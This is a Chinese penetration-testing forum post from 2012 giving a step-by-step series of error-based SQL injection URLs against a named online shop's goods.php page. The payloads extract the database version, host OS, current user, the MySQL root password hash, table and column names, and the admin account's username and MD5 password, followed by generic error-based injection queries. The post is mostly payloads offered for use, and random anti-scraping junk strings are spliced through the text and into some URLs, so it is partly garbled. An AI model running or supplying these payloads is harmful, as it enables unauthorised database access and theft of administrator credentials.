找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2381|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
/ H0 q" o" g/ q; ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 J* h& s. \/ n- d9 |
+ k4 U3 ^6 ]. ^9 J, _
判断系统
3 j. o0 E; a! N# R+ S7 |* l3 K% Q' H; O2 X6 A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. ~, w5 b! v( [( B2 O) j2 b% x3 W( T: n4 w$ R

  l9 q0 h4 u$ ~" u; z+ w3 d0 l
  G! q! @3 y9 H0 Z6 T# J: G当前 user()
" F( C. U; Q4 u( b" J
5 L+ ~6 d, U$ o# J6 hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, Y# s$ i( \. I$ e4 d
0 V' o: F/ a" Z9 g5 {5 n4 j9 [/ V! J/ z$ {" x0 Q9 r
" Q+ F; c5 O  `9 D
当前 database()4 p+ t* N! a& j2 u4 w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) d: Q, q3 ]& V" C  `0 c4 v& Y- }& _* O. h% A( n# b& l2 ]- @

% L1 P! ?$ b" E7 T' S% |8 k* d& ~$ T9 q, |+ c  J
( ^4 D7 @! A1 |7 G( T8 t& f
root hash
; U+ n- ^8 d  j# U9 }
& q) r9 i0 j6 u- r4 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 p2 m  c7 x1 t
; T0 w- V* m$ }4 B
& {  `$ i  n. K4 J
* T; Z1 l/ a# ?2 W# [0 L# ~5 U
当前 数据库表名
/ s8 G- _) E, T3 \& O" @% I
, Z* g1 W9 S1 M* u; B* b% E) qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 @* p5 H  |+ }  t! P* n% H: s

  a: Z; s0 ~0 R; w3 r' x; W; |- ?1 k) F. s2 Z1 N

. _" p! b, c7 M# H当前 数据库 user_name 字段
# p2 p! w8 D4 p& P0 L/ @
) e* B9 o; `1 @. ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% e, w& n, E: P9 G# c+ o
' D) @9 w( s$ {6 {" \当前 数据库 字段 password
3 C3 J, ^6 l1 |' J- i$ ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: X5 q+ z4 D* v6 U
8 }2 O! x# J$ o2 N

& I) d  L% Q' b$ j8 x
' @4 y) o' K; T% S/ L' v获得 admin passwd(md5)" }; O! l4 F- y2 I( H

0 n- d2 w: Z( `* G7 t' X( U0 c; k+ G% r  {- l
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- L9 q! l9 m' W  g+ c9 P+ ?4 H5 r0 c
报错注射
  O6 m( w& u" `. pSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) ^8 [+ [) h! @  B) Z' P! ~$ b. f$ j' M  _
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ n( E; M& l+ ^
) w# T  [! |+ p
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表